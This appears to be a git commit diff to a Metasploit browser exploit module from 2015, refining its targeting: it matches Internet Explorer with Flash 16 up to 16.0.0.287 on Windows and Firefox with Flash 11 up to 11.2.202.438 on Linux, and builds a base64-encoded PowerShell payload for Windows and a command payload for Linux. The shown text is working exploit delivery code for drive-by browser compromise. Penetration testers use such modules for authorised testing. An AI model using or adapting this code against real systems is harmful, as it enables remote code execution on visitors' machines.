Use all the BES power

unstable
jvazquez-r7 2015-05-21 14:06:41 -05:00
parent 4a5d2d1d24
commit b9f9647ab1
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 22 additions and 6 deletions

View File

@ -45,16 +45,31 @@ class Metasploit3 < Msf::Exploit::Remote
'BrowserRequirements' => 'BrowserRequirements' =>
{ {
:source => /script|headers/i, :source => /script|headers/i,
:arch => ARCH_X86,
:os_name => lambda do |os| :os_name => lambda do |os|
os =~ OperatingSystems::Match::LINUX || os =~ OperatingSystems::Match::LINUX ||
os =~ OperatingSystems::Match::WINDOWS_7 os =~ OperatingSystems::Match::WINDOWS_7
end, end,
:ua_name => lambda { |ua| [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua) }, :ua_name => lambda do |ua|
case target.name
when 'Windows'
return true if ua == Msf::HttpClients::IE
when 'Linux'
return true if ua == Msf::HttpClients::FF
end
false
end,
:flash => lambda do |ver| :flash => lambda do |ver|
(ver =~ /^16\./ && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.287')) || case target.name
(ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.438')) when 'Windows'
end, return true if ver =~ /^16\./ && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.287')
:arch => ARCH_X86 when 'Linux'
return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.438')
end
false
end
}, },
'Targets' => 'Targets' =>
[ [
@ -97,13 +112,14 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit_template(cli, target_info) def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
if target.name =~ /Windows/ if target.name =~ /Windows/
target_payload = get_payload(cli, target_info)
psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
b64_payload = Rex::Text.encode_base64(psh_payload) b64_payload = Rex::Text.encode_base64(psh_payload)
platform_id = 'win' platform_id = 'win'
elsif target.name =~ /Linux/ elsif target.name =~ /Linux/
target_payload = get_payload(cli, target_info.merge(arch: ARCH_CMD))
b64_payload = Rex::Text.encode_base64(target_payload) b64_payload = Rex::Text.encode_base64(target_payload)
platform_id = 'linux' platform_id = 'linux'
end end